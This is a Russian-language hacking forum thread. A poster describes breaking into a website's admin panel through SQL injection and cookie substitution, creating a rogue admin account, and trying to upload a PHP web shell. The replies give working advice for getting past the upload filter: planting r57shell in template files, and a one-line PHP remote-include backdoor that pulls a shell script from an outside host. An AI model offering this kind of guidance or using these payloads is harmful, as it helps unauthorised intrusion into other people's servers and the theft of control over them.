Сабж. При помощи sql-inj получил ID и хеш админа путем подмены кукисов проник в админ панель и зарегал нового админа Dumer : 12345 теперь имею полный доступ к админ панели. Добавил в разрешенные типы файлов для закачки расширение php в коментах ниже написано: Разделять с помощью запятых, без пробелов. При добавлении новых типов файлов, создайте новую директорию шаблонов. Как создаётся новая директория шабов и не знаю. Пытаюсь залить шелл вылазиет: Я даже низнаю что придумать. Мож кто подскажет ? Перед этим я пытался заливать шелл как картинку. Например залил шелл захожу по ссылке: Выдает: Заливаю шелл от nfm выдаёт тупо код и т.д. например как его просто открываеш браузером. Скорее всего там стоит фильтр на символы: < ; , Вообще мне кажется надо мутить что то в админ панели. Помагите кто знает.
я конешно в этом ничего не понимаю, но я видел видео где перед заливом шела(вроди)чел убирал .php Или это php-инъекция была.
А ты не думал, что может стоять самописный антишелл? Если ты говоришь про галерею одной игры, то там такой и стоит...так что можешь не мучаться...
конкретно с этим скриптом не работал, но можно как вариант если там можно редактировать файлы скинов, то можно попробовать внедрить шелл туды. Поищи еще какие нить скрипты на серваке, может там где нить форум есть. А может ты неправильно указал тип файла при добавлении нового типа загружаемых файлов.
попробуй отредактировать в шаблонах какой нибуть файл (например phpinfo.php), а потом запустить... admin/phpinfo.php (запиши туда нормальный r57shell) у меня получалось...
сделай не passthru(); а PHP: <? include($_GET["inc"]); ?> и инклудь нормальный шелл 123.php?inc=http://inferno23x.jino-net.ru/shells/r57shell.txt
